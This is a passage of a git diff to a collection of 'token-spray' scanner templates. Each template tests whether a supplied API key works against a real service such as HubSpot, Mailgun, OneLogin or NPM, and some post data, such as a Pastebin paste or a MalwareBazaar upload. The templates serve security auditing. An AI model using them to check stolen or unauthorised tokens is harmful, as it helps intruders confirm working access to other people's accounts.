4b0a00483046022100feb1b70cc116a0e5e28e60351b93907f2994f9f53d4f5ce7337bd1e5581d1f95022100932bf3b672f01049a27014ca2bac8996fb16ac2f4ab829bdf96a780ecd3620ec:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-hirak-rates.yaml b/poc/api/api-hirak-rates.yaml deleted file mode 100644 index 6d61403334..0000000000 --- a/poc/api/api-hirak-rates.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-hirak-rates - -info: - name: Hirak Exchange Rates API Test - author: daffainfo - severity: info - description: Exchange rates between 162 currency & 300 crypto currency update each 5 min, accurate, no limits - reference: - - https://rates.hirak.site/ - - https://github.com/daffainfo/all-about-apikey/tree/main/hirak-exchange-rates - tags: token-spray,hirak - -self-contained: true -requests: - - method: GET - path: - - "https://rates.hirak.site/stat/?token={{token}}" - - matchers: - - type: word - part: body - words: - - '"token":' - - '"plan":' - - '"hits":' - - '"remain":' - condition: and diff --git a/poc/api/api-hubspot-437.yaml b/poc/api/api-hubspot-437.yaml index c646cf8861..86566864f0 100644 --- a/poc/api/api-hubspot-437.yaml +++ b/poc/api/api-hubspot-437.yaml @@ -3,35 +3,19 @@ id: api-hubspot info: name: HubSpot API Test author: zzeitlin + reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners severity: info - reference: - - https://legacydocs.hubspot.com/docs/methods/owners/get_owners - metadata: - max-request: 2 tags: token-spray,hubspot -self-contained: true - -http: +requests: - method: GET path: - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" - - "https://api.hubapi.com/contacts/v1/lists/static?count=3&hapikey={{token}}" + - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" - matchers-condition: or matchers: - type: word part: body words: - - '"portalId":' - - '"ownerId":' - condition: and - - - type: word - part: body - words: - - '"metaData":' - - '"portalId":' - condition: and - -# digest: 490a0046304402202d9d252f0d8b0085a26265fbc5fa552f807d095394b41127971494d3382c2b6b022061acc2a5a6142ef4ee85fc60d8c3b097a1a6f9ed82bbbaf31b2da23da50b313f:922c64590222798bb761d5b6d8e72950 + - 'error' + negative: true diff --git a/poc/api/api-iconfinder-439.yaml b/poc/api/api-iconfinder-439.yaml deleted file mode 100644 index 1d396884b1..0000000000 --- a/poc/api/api-iconfinder-439.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: api-iconfinder - -info: - name: IconFinder API Test - author: daffainfo - severity: info - description: Web Icons - reference: - - https://developer.iconfinder.com/reference/overview-1 - - https://github.com/daffainfo/all-about-apikey/tree/main/iconfinder - metadata: - max-request: 1 - tags: token-spray,iconfinder - -self-contained: true - -http: - - raw: - - | - GET https://api.iconfinder.com/v4/icons/search?query=arrow&count=10 HTTP/1.1 - Host: api.iconfinder.com - Accept: application/json - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - '"icons":' - - '"is_icon_glyph":' - - '"download_url":' - condition: and - -# digest: 4a0a0047304502203525d06ca37e214ea31d40d32b70a0e233bf879bee960cbb34fb4436a8c78320022100a678e3bcbc2678eaa6fe709c8b1210b528254b68294b4ce07620fbe1c000ed6f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-iconfinder.yaml b/poc/api/api-iconfinder.yaml new file mode 100644 index 0000000000..bb60932abb --- /dev/null +++ b/poc/api/api-iconfinder.yaml @@ -0,0 +1,28 @@ +id: api-iconfinder + +info: + name: IconFinder API Test + author: daffainfo + severity: info + reference: + - https://developer.iconfinder.com/reference/overview-1 + - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/IconFinder.md + tags: token-spray,iconfinder + +self-contained: true +requests: + - raw: + - | + GET https://api.iconfinder.com/v4/icons/search?query=arrow&count=10 HTTP/1.1 + Host: api.iconfinder.com + Accept: application/json + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"icons":' + - '"is_icon_glyph":' + - '"download_url":' + condition: and diff --git a/poc/api/api-instagram.yaml b/poc/api/api-instagram.yaml index fc463c8bac..7a9e6301f0 100644 --- a/poc/api/api-instagram.yaml +++ b/poc/api/api-instagram.yaml @@ -3,12 +3,16 @@ id: api-instagramgraph info: name: Instagram Graph API Test author: zzeitlin - reference: https://developers.facebook.com/docs/instagram-api/getting-started severity: info + reference: + - https://developers.facebook.com/docs/instagram-api/getting-started + metadata: + max-request: 1 tags: token-spray,instagram,graph self-contained: true -requests: + +http: - method: GET path: - "https://graph.facebook.com/v12.0/me/accounts?access_token={{token}}" @@ -21,3 +25,5 @@ requests: - '"access_token":' - '"name":' condition: and + +# digest: 4a0a004730450220146bd47f0c375401f1e505bb59c118fb400158865929ccc4a0a1e3e998bb6c8c022100931ce1826228f7c66289078fc9eaeda2ef2c5d0491318933400ca518e9073b89:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-instatus-442.yaml b/poc/api/api-instatus-442.yaml deleted file mode 100644 index dfd968d1b3..0000000000 --- a/poc/api/api-instatus-442.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: api-instatus - -info: - name: Instatus API Test - author: daffainfo - severity: info - description: Post to and update maintenance and incidents on your status page through an HTTP REST API - reference: - - https://instatus.com/help/api - - https://github.com/daffainfo/all-about-apikey/tree/main/instatus - metadata: - max-request: 1 - tags: token-spray,instatus - -self-contained: true - -http: - - method: GET - path: - - "https://api.instatus.com/v1/pages" - - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"id":' - - '"subdomain":' - - '"name":' - - '"logoUrl":' - condition: and - -# digest: 4a0a00473045022100850e53c92a054ffcf08500f345965b5674f65e8974a2d82117d4c127f613fcff02207fa1e6c159c8c013d78f0137271ff8bcba2204413bd77bb35fa6a1d25dc7c4d0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-instatus.yaml b/poc/api/api-instatus.yaml new file mode 100644 index 0000000000..1175f1b8b3 --- /dev/null +++ b/poc/api/api-instatus.yaml @@ -0,0 +1,29 @@ +id: api-instatus + +info: + name: Instatus API Test + author: daffainfo + severity: info + description: Post to and update maintenance and incidents on your status page through an HTTP REST API + reference: + - https://instatus.com/help/api + - https://github.com/daffainfo/all-about-apikey/tree/main/instatus + tags: token-spray,instatus + +self-contained: true +requests: + - method: GET + path: + - "https://api.instatus.com/v1/pages" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"id":' + - '"subdomain":' + - '"name":' + - '"logoUrl":' + condition: and diff --git a/poc/api/api-intercom-443.yaml b/poc/api/api-intercom-443.yaml new file mode 100644 index 0000000000..4ae7ce807b --- /dev/null +++ b/poc/api/api-intercom-443.yaml @@ -0,0 +1,30 @@ +id: api-intercom + +info: + name: Intercom API Test + author: dwisiswant0 + severity: info + reference: + - https://developers.intercom.com/building-apps/docs/rest-api-reference + metadata: + max-request: 1 + tags: token-spray,intercom + +self-contained: true + +http: + - method: GET + path: + - "https://api.intercom.io/users" + + headers: + Authorization: Bearer {{token}} + Accept: application/json + matchers: + - type: word + part: body + words: + - "Access Token Invalid" + negative: true + +# digest: 4b0a00483046022100961f1591bb9414b8304809c1253739861d2e47d3555bf7caaf47cb719aec2ad602210082a496a018342802274a471a3bfd500c4e82ac6eefe13a1efc643e102609fcbc:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-intercom.yaml b/poc/api/api-intercom.yaml deleted file mode 100644 index 5c0dc15191..0000000000 --- a/poc/api/api-intercom.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: api-intercom - -info: - name: Intercom API Test - author: dwisiswant0 - reference: https://developers.intercom.com/building-apps/docs/rest-api-reference - severity: info - tags: token-spray,intercom - -self-contained: true -requests: - - method: GET - path: - - "https://api.intercom.io/users" - headers: - Authorization: Bearer {{token}} - Accept: application/json - - matchers: - - type: word - part: body - words: - - "Access Token Invalid" - negative: true diff --git a/poc/api/api-ipstack-444.yaml b/poc/api/api-ipstack-444.yaml deleted file mode 100644 index 8f560a1b34..0000000000 --- a/poc/api/api-ipstack-444.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: api-ipstack - -info: - name: IPStack API Test - author: zzeitlin - severity: info - reference: https://ipstack.com/documentation - tags: token-spray,ipstack - -self-contained: true -requests: - - method: GET - path: - - "https://api.ipstack.com/8.8.8.8?access_key={{token}}" - - matchers: - - type: word - part: body - words: - - '"ip":' - - '"hostname":' - - '"type":' - condition: and diff --git a/poc/api/api-ipstack.yaml b/poc/api/api-ipstack.yaml index f64daea02e..8f560a1b34 100644 --- a/poc/api/api-ipstack.yaml +++ b/poc/api/api-ipstack.yaml @@ -3,10 +3,11 @@ id: api-ipstack info: name: IPStack API Test author: zzeitlin - reference: https://ipstack.com/documentation severity: info + reference: https://ipstack.com/documentation tags: token-spray,ipstack +self-contained: true requests: - method: GET path: @@ -15,6 +16,8 @@ requests: matchers: - type: word part: body - negative: true words: - - 'invalid_access_key' + - '"ip":' + - '"hostname":' + - '"type":' + condition: and diff --git a/poc/api/api-iterable-445.yaml b/poc/api/api-iterable-445.yaml new file mode 100644 index 0000000000..b559444b8f --- /dev/null +++ b/poc/api/api-iterable-445.yaml @@ -0,0 +1,24 @@ +id: api-iterable + +info: + name: Iterable API Test + author: zzeitlin + severity: info + reference: https://api.iterable.com/api/docs + tags: token-spray,iterable + +self-contained: true +requests: + - method: GET + path: + - "https://api.iterable.com/api/catalogs" + headers: + Api_Key: "{{token}}" + + matchers: + - type: word + part: body + words: + - '"name":' + - '"catalogNames":' + condition: and diff --git a/poc/api/api-iterable.yaml b/poc/api/api-iterable.yaml index b559444b8f..0c1f84d566 100644 --- a/poc/api/api-iterable.yaml +++ b/poc/api/api-iterable.yaml @@ -3,22 +3,21 @@ id: api-iterable info: name: Iterable API Test author: zzeitlin - severity: info reference: https://api.iterable.com/api/docs + severity: info tags: token-spray,iterable -self-contained: true requests: - method: GET path: - - "https://api.iterable.com/api/catalogs" + - "https://api.iterable.com/api/export/data.json?dataTypeName=emailSend&range=Today&onlyFields=List.empty" headers: Api_Key: "{{token}}" matchers: - type: word part: body + negative: true words: - - '"name":' - - '"catalogNames":' - condition: and + - 'BadApiKey' + - 'RateLimitExceeded' # Matchers needs to be replaced with valid +ve match instead of -ve diff --git a/poc/api/api-jumpcloud-446.yaml b/poc/api/api-jumpcloud-446.yaml deleted file mode 100644 index a885c5c780..0000000000 --- a/poc/api/api-jumpcloud-446.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-jumpcloud - -info: - name: JumpCloud API Test - author: zzeitlin - reference: https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key - severity: info - tags: token-spray,jumpcloud - -requests: - - method: GET - path: - - "https://console.jumpcloud.com/api/systems" - headers: - X-Api-Key: "{{token}}" - - matchers: - - type: word - part: body - negative: true - words: - - 'Unauthorized' diff --git a/poc/api/api-jumpcloud.yaml b/poc/api/api-jumpcloud.yaml new file mode 100644 index 0000000000..6b9dc68d93 --- /dev/null +++ b/poc/api/api-jumpcloud.yaml @@ -0,0 +1,24 @@ +id: api-jumpcloud + +info: + name: JumpCloud API Test + author: zzeitlin + severity: info + reference: https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key + tags: token-spray,jumpcloud + +self-contained: true +requests: + - method: GET + path: + - "https://console.jumpcloud.com/api/systems" + headers: + X-Api-Key: "{{token}}" + + matchers: + - type: word + part: body + words: + - '"_id":' + - '"agentServer":' + condition: and diff --git a/poc/api/api-launchdarkly-449.yaml b/poc/api/api-launchdarkly-449.yaml new file mode 100644 index 0000000000..5490750be5 --- /dev/null +++ b/poc/api/api-launchdarkly-449.yaml @@ -0,0 +1,34 @@ +id: api-launchdarkly + +info: + name: LaunchDarkly REST API + author: Luqmaan Hadia + severity: info + reference: + - https://apidocs.launchdarkly.com/ + metadata: + max-request: 1 + tags: token-spray,launchdarkly + +self-contained: true + +http: + - raw: + - | + GET https://app.launchdarkly.com/api/v2/members HTTP/1.1 + Host: app.launchdarkly.com + Authorization: {{token}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"totalCount":' + - '"items":' + condition: and + +# digest: 4a0a00473045022059ba18b8d17fc3603d02f111b48fdc488776904846a5a670916ef5910158d0f30221008808cf1122a8d79312a459b7a53df6bb553bb4c9419cc2d5dea3ae9ef558b51e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-launchdarkly.yaml b/poc/api/api-launchdarkly.yaml deleted file mode 100644 index 636ca9f02f..0000000000 --- a/poc/api/api-launchdarkly.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: api-launchdarkly - -info: - name: LaunchDarkly REST API - author: Luqmaan Hadia - severity: info - reference: https://apidocs.launchdarkly.com/ - tags: token-spray,launchdarkly - -self-contained: true -requests: - - raw: - - | - GET https://app.launchdarkly.com/api/v2/members HTTP/1.1 - Host: app.launchdarkly.com - Authorization: {{token}} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"totalCount":' - - '"items":' - condition: and diff --git a/poc/api/api-lokalise-452.yaml b/poc/api/api-lokalise-452.yaml index dee73aef67..0c937b51fa 100644 --- a/poc/api/api-lokalise-452.yaml +++ b/poc/api/api-lokalise-452.yaml @@ -3,29 +3,18 @@ id: api-lokalise info: name: Lokalise API Test author: zzeitlin + reference: https://app.lokalise.com/api2docs/curl/#resource-projects severity: info - reference: - - https://app.lokalise.com/api2docs/curl/#resource-projects - metadata: - max-request: 1 tags: token-spray,lokalise -self-contained: true - -http: +requests: - method: GET path: - - "https://api.lokalise.com/api2/teams" - + - "https://api.lokalise.com/api2/projects/" headers: - x-api-Token: "{{token}}" - matchers: - - type: word - part: body - words: - - '"teams":' - - '"team_id":' - - '"name":' - condition: and + X-Api-Token: "{{token}}" -# digest: 490a0046304402200468ba3586af8409dee972a0b94557619c54822d342eb7ab7b50665c109be31602200632c349219570aebdd75e41dc4e7e1a1bccb50b2a6fe2d1b4ebdbf5816d7bad:922c64590222798bb761d5b6d8e72950 + matchers: + - type: status + status: + - 200 diff --git a/poc/api/api-loqate-453.yaml b/poc/api/api-loqate.yaml similarity index 100% rename from poc/api/api-loqate-453.yaml rename to poc/api/api-loqate.yaml diff --git a/poc/api/api-mailchimp-454.yaml b/poc/api/api-mailchimp-454.yaml index 9d7073e46c..5232ddda97 100644 --- a/poc/api/api-mailchimp-454.yaml +++ b/poc/api/api-mailchimp-454.yaml @@ -3,10 +3,11 @@ id: api-mailchimp info: name: Mailchimp API Test author: zzeitlin - reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration severity: info + reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration tags: token-spray,mailchimp +self-contained: true network: - inputs: - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" diff --git a/poc/api/api-mailgun-455.yaml b/poc/api/api-mailgun-455.yaml index 3667ba1c69..dfa06bdfaa 100644 --- a/poc/api/api-mailgun-455.yaml +++ b/poc/api/api-mailgun-455.yaml @@ -3,10 +3,11 @@ id: api-mailgun info: name: Mailgun API Test author: zzeitlin - reference: https://documentation.mailgun.com/en/latest/api-intro.html severity: info + reference: https://documentation.mailgun.com/en/latest/api-intro.html tags: token-spray,mailgun +self-contained: true requests: - method: GET path: @@ -15,6 +16,10 @@ requests: Authorization: Basic {{base64('api:' + token)}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"total_count":' + - '"items":' + - '"created_at":' + condition: and diff --git a/poc/api/api-malshare-456.yaml b/poc/api/api-malshare-456.yaml index d486f6f0fd..69f9e105b3 100644 --- a/poc/api/api-malshare-456.yaml +++ b/poc/api/api-malshare-456.yaml @@ -4,13 +4,17 @@ info: name: MalShare API Test author: daffainfo severity: info + description: Malware Archive / file sourcing reference: - https://malshare.com/doc.php - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalShare.md + - https://github.com/daffainfo/all-about-apikey/tree/main/malshare + metadata: + max-request: 1 tags: token-spray,malshare self-contained: true -requests: + +http: - method: GET path: - "https://api.malshare.com/api.php?api_key={{token}}&action=getlist" @@ -22,3 +26,5 @@ requests: - '"md5":' - '"sha1":' condition: and + +# digest: 490a0046304402201f0d28dc875a5526f01fcabdb2e73a860ecff61d46cd931f8ec3a2652a45f7dc022033d354822af70d6a3fd65f68e1eb820b413743b263a7d0dfbac4a62a28e23c42:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-malshare-457.yaml b/poc/api/api-malshare-457.yaml new file mode 100644 index 0000000000..d486f6f0fd --- /dev/null +++ b/poc/api/api-malshare-457.yaml @@ -0,0 +1,24 @@ +id: api-malshare + +info: + name: MalShare API Test + author: daffainfo + severity: info + reference: + - https://malshare.com/doc.php + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalShare.md + tags: token-spray,malshare + +self-contained: true +requests: + - method: GET + path: + - "https://api.malshare.com/api.php?api_key={{token}}&action=getlist" + + matchers: + - type: word + part: body + words: + - '"md5":' + - '"sha1":' + condition: and diff --git a/poc/api/api-malwarebazaar.yaml b/poc/api/api-malwarebazaar.yaml new file mode 100644 index 0000000000..ce99bd0a43 --- /dev/null +++ b/poc/api/api-malwarebazaar.yaml @@ -0,0 +1,40 @@ +id: api-malwarebazaar + +info: + name: MalwareBazaar API Test + author: daffainfo + severity: info + reference: + - https://bazaar.abuse.ch/api/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalwareBazaar.md + tags: token-spray,malwarebazaar + +self-contained: true +requests: + - raw: + - | + POST https://mb-api.abuse.ch/api/v1 HTTP/1.1 + Host: mb-api.abuse.ch + API-KEY: {{token}} + Content-Length: 0 + Content-Type: multipart/form-data; boundary=545d0ca717a743c3bd4fa575585f74c6 + + --545d0ca717a743c3bd4fa575585f74c6 + Content-Disposition: form-data; name="json_data" + Content-Type: application/json + + {"tags": ["exe", "test"], "references": {"twitter": ["https://twitter.com/abuse_ch/status/1224269018506330112"], "malpedia": ["https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi"], "joe_sandbox": ["https://www.joesecurity.org/reports/1", "https://www.joesecurity.org/reports/2"], "links": ["https://urlhaus.abuse.ch/url/306613/"], "any_run": ["https://app.any.run/tasks/1", "https://app.any.run/tasks/2"]}, "context": {"comment": "this malware sample is very nasty!", "dropped_by_md5": ["68b329da9893e34099c7d8ad5cb9c940"], "dropped_by_malware": ["Gozi"], "dropped_by_sha256": ["01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", "4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865"]}, "anonymous": 1, "delivery_method": "email_attachment"} + --545d0ca717a743c3bd4fa575585f74c6 + Content-Disposition: form-data; name="file"; filename="1.txt" + + dssd + + --545d0ca717a743c3bd4fa575585f74c6-- + + matchers: + - type: word + part: body + words: + - '"query_status": "inserted"' + - '"query_status": "file_already_known"' + condition: or diff --git a/poc/api/api-mapbox.yaml b/poc/api/api-mapbox.yaml new file mode 100644 index 0000000000..c4640d9695 --- /dev/null +++ b/poc/api/api-mapbox.yaml @@ -0,0 +1,19 @@ +id: api-mapbox + +info: + name: Mapbox API Test + author: zzeitlin + reference: https://docs.mapbox.com/api/search/geocoding/ + severity: info + tags: token-spray,mapbox + +requests: + - method: GET + path: + - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" + + matchers: + - type: status + status: + - 401 + negative: true diff --git a/poc/api/api-mywot.yaml b/poc/api/api-mywot-467.yaml similarity index 100% rename from poc/api/api-mywot.yaml rename to poc/api/api-mywot-467.yaml diff --git a/poc/api/api-mywot-468.yaml b/poc/api/api-mywot-468.yaml index 7256c5d9e8..6f1f3daaf1 100644 --- a/poc/api/api-mywot-468.yaml +++ b/poc/api/api-mywot-468.yaml @@ -4,13 +4,17 @@ info: name: My Web of Trust API author: daffainfo severity: info + description: IP/domain/URL reputation reference: - https://support.mywot.com/hc/en-us/sections/360004477734-API- - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/Web%20of%20Trust.md + - https://github.com/daffainfo/all-about-apikey/tree/main/web-of-trust + metadata: + max-request: 1 tags: token-spray,weboftrust self-contained: true -requests: + +http: - raw: - | GET https://scorecard.api.mywot.com/v3/targets?t=hbo.com&t=google.com HTTP/1.1 @@ -25,3 +29,5 @@ requests: - '"target":' - '"safety":' condition: and + +# digest: 490a00463044022050822dedbfa563ddf5000add7b851539b264a5b3a2b59a8669ea936e869c9b4802207ada282ba59cbc6034abd040b87aca4b296b655d7de41e31af8297ebae4bf2f9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-npm.yaml b/poc/api/api-npm.yaml deleted file mode 100644 index cfe2c86746..0000000000 --- a/poc/api/api-npm.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-npm - -info: - name: NPM API Test - author: zzeitlin - reference: https://docs.npmjs.com/creating-and-viewing-access-tokens - severity: info - tags: token-spray,node,npm,package,manager - -requests: - - method: GET - path: - - "https://registry.npmjs.org/-/whoami" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: status - status: - - 401 - - 403 - negative: true diff --git a/poc/api/api-onelogin-472.yaml b/poc/api/api-onelogin-472.yaml deleted file mode 100644 index 1a1de60b69..0000000000 --- a/poc/api/api-onelogin-472.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-onelogin - -info: - name: OneLogin API Test - author: dwisiswant0 - severity: info - reference: - - https://developers.onelogin.com/api-docs/2/getting-started/dev-overview - metadata: - max-request: 2 - tags: token-spray,onelogin - -self-contained: true - -http: - - method: GET - path: - - "https://api.us.onelogin.com/api/2/apps" - - "https://api.eu.onelogin.com/api/2/apps" - - headers: - Authorization: Bearer {{token}} - stop-at-first-match: true - matchers: - - type: word - part: body - words: - - '"id":' - - '"connector_id":' - - '"auth_method":' - condition: and - -# digest: 4b0a00483046022100c863b1c5238bae97a22123c1fbcc2dffca09b867f1799b647646ae4ecc1fa317022100e9d0e913bb9c5089ceb35ecb0caa5f24a658dbd956febbb59d91a64027c9c728:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-onelogin.yaml b/poc/api/api-onelogin.yaml new file mode 100644 index 0000000000..d8369ad80b --- /dev/null +++ b/poc/api/api-onelogin.yaml @@ -0,0 +1,27 @@ +id: api-onelogin + +info: + name: OneLogin API Test + author: dwisiswant0 + severity: info + reference: https://developers.onelogin.com/api-docs/2/getting-started/dev-overview + tags: token-spray,onelogin + +self-contained: true +requests: + - method: GET + path: + - "https://api.us.onelogin.com/api/2/apps" + - "https://api.eu.onelogin.com/api/2/apps" + headers: + Authorization: Bearer {{token}} + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - '"id":' + - '"connector_id":' + - '"auth_method":' + condition: and diff --git a/poc/api/api-openweather-473.yaml b/poc/api/api-openweather.yaml similarity index 100% rename from poc/api/api-openweather-473.yaml rename to poc/api/api-openweather.yaml diff --git a/poc/api/api-pagerduty-475.yaml b/poc/api/api-pagerduty-475.yaml index fcc00d7e88..902fae8ec0 100644 --- a/poc/api/api-pagerduty-475.yaml +++ b/poc/api/api-pagerduty-475.yaml @@ -3,10 +3,11 @@ id: api-pagerduty info: name: Pagerduty API Test author: zzeitlin - reference: https://developer.pagerduty.com/api-reference severity: info + reference: https://developer.pagerduty.com/api-reference tags: token-spray,pagerduty +self-contained: true requests: - method: GET path: @@ -16,7 +17,9 @@ requests: Authorization: Token token={{token}} matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"schedules":' + - '"id":' + condition: and diff --git a/poc/api/api-pastebin-477.yaml b/poc/api/api-pastebin-477.yaml deleted file mode 100644 index 8ba34c233c..0000000000 --- a/poc/api/api-pastebin-477.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-pastebin - -info: - name: Pastebin API Test - author: daffainfo - severity: info - description: Plain Text Storage - reference: - - https://pastebin.com/doc_api - - https://github.com/daffainfo/all-about-apikey/tree/main/pastebin - metadata: - max-request: 1 - tags: token-spray,pastebin - -self-contained: true - -http: - - raw: - - | - POST https://pastebin.com/api/api_post.php HTTP/1.1 - Host: pastebin.com - Content-Type: application/x-www-form-urlencoded - Content-Length: 81 - - api_dev_key={{token}}&api_paste_code=test&api_option=paste - - matchers: - - type: word - part: body - words: - - 'https://pastebin.com/' - -# digest: 4b0a00483046022100eac9e0b97c3915c66cda23bbd328df846b9621894c0963d6062014c114dcef660221008fd9e82eabfc93bc07c39c981b6c8cdf815eb65b00212b1ceaefdb29cb3eabdb:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-pastebin.yaml b/poc/api/api-pastebin.yaml new file mode 100644 index 0000000000..ab46ebbc09 --- /dev/null +++ b/poc/api/api-pastebin.yaml @@ -0,0 +1,28 @@ +id: api-pastebin + +info: + name: Pastebin API Test + author: daffainfo + severity: info + description: Plain Text Storage + reference: + - https://pastebin.com/doc_api + - https://github.com/daffainfo/all-about-apikey/tree/main/pastebin + tags: token-spray,pastebin + +self-contained: true +requests: + - raw: + - | + POST https://pastebin.com/api/api_post.php HTTP/1.1 + Host: pastebin.com + Content-Type: application/x-www-form-urlencoded + Content-Length: 81 + + api_dev_key={{token}}&api_paste_code=test&api_option=paste + + matchers: + - type: word + part: body + words: + - 'https://pastebin.com/' diff --git a/poc/api/api-pendo-479.yaml b/poc/api/api-pendo-479.yaml index 947544e34f..023a6f347c 100644 --- a/poc/api/api-pendo-479.yaml +++ b/poc/api/api-pendo-479.yaml @@ -4,28 +4,22 @@ info: name: Pendo API Test author: zzeitlin severity: info - reference: - - https://help.pendo.io/resources/support-library/api/index.html - metadata: - max-request: 1 + reference: https://help.pendo.io/resources/support-library/api/index.html tags: token-spray,pendo self-contained: true - -http: +requests: - method: GET path: - "https://app.pendo.io/api/v1/feature" - headers: Content-Type: application/json X-Pendo-Integration-Key: "{{token}}" + matchers: - type: word part: body words: - '"createdByUser":' - '"id":' - condition: and - -# digest: 4a0a0047304502203e9dec57e3a3b1893b734cdfbcd61fdf14292922af2216ada184e02677c6edfb022100d63c66571aaf02978d27d4629226be5ac20a3a419cebbd8d5584064961ba2f80:922c64590222798bb761d5b6d8e72950 + condition: and \ No newline at end of file diff --git a/poc/api/api-petfinder-480.yaml b/poc/api/api-petfinder-480.yaml deleted file mode 100644 index 7067e2d97a..0000000000 --- a/poc/api/api-petfinder-480.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: api-petfinder - -info: - name: Petfinder API Test - author: daffainfo - severity: info - description: Petfinder is dedicated to helping pets find homes, another resource to get pets adopted - reference: - - https://www.petfinder.com/developers/v2/docs/ - - https://github.com/daffainfo/all-about-apikey/tree/main/petfinder - metadata: - max-request: 1 - tags: token-spray,petfinder - -self-contained: true - -http: - - raw: - - | - POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 - Host: api.petfinder.com - Content-Type: application/x-www-form-urlencoded - Content-Length: 81 - - grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} - - matchers: - - type: word - part: body - words: - - '"token_type"' - - '"expires_in"' - - '"access_token"' - condition: and - -# digest: 490a0046304402205df678454684e798c9f3bfe4c88e7b86a5fe36217b85109635c57b13df65cbc702202539e9116f2321678f5c72b1f510e253761d1e1c425ee6cd15fcdc3bac2f77e5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-petfinder.yaml b/poc/api/api-petfinder.yaml new file mode 100644 index 0000000000..ae0b6866a1 --- /dev/null +++ b/poc/api/api-petfinder.yaml @@ -0,0 +1,31 @@ +id: api-petfinder + +info: + name: Petfinder API Test + author: daffainfo + severity: info + description: Petfinder is dedicated to helping pets find homes, another resource to get pets adopted + reference: + - https://www.petfinder.com/developers/v2/docs/ + - https://github.com/daffainfo/all-about-apikey/tree/main/petfinder + tags: token-spray,petfinder + +self-contained: true +requests: + - raw: + - | + POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 + Host: api.petfinder.com + Content-Type: application/x-www-form-urlencoded + Content-Length: 81 + + grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} + + matchers: + - type: word + part: body + words: + - '"token_type"' + - '"expires_in"' + - '"access_token"' + condition: and diff --git a/poc/api/api-pinata-481.yaml b/poc/api/api-pinata-481.yaml new file mode 100644 index 0000000000..a2a7c68b11 --- /dev/null +++ b/poc/api/api-pinata-481.yaml @@ -0,0 +1,33 @@ +id: api-pinata + +info: + name: Pinata API Test + author: daffainfo + severity: info + description: IPFS Pinning Services API + reference: + - https://docs.pinata.cloud/ + - https://github.com/daffainfo/all-about-apikey/tree/main/pinata + metadata: + max-request: 1 + tags: token-spray,pinata + +self-contained: true + +http: + - raw: + - | + GET https://api.pinata.cloud/data/pinList?status=pinned HTTP/1.1 + Host: api.pinata.cloud + pinata_api_key: {{token}} + pinata_secret_api_key: {{secret}} + + matchers: + - type: word + part: body + words: + - '"id"' + - '"ipfs_pin_hash"' + condition: and + +# digest: 4a0a0047304502210084b17cc869f96b2fa7f8b058f8230f387233d015d16b030c2756f417e6544bd8022007dab03aa667aa18ef1acdb45d0029325ab854b1d82b75a297cbb2c307ab85c8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-pinata.yaml b/poc/api/api-pinata.yaml deleted file mode 100644 index 89660d1f6e..0000000000 --- a/poc/api/api-pinata.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: api-pinata - -info: - name: Pinata API Test - author: daffainfo - severity: info - description: IPFS Pinning Services API - reference: - - https://docs.pinata.cloud/ - - https://github.com/daffainfo/all-about-apikey/tree/main/pinata - tags: token-spray,pinata - -self-contained: true -requests: - - raw: - - | - GET https://api.pinata.cloud/data/pinList?status=pinned HTTP/1.1 - Host: api.pinata.cloud - pinata_api_key: {{token}} - pinata_secret_api_key: 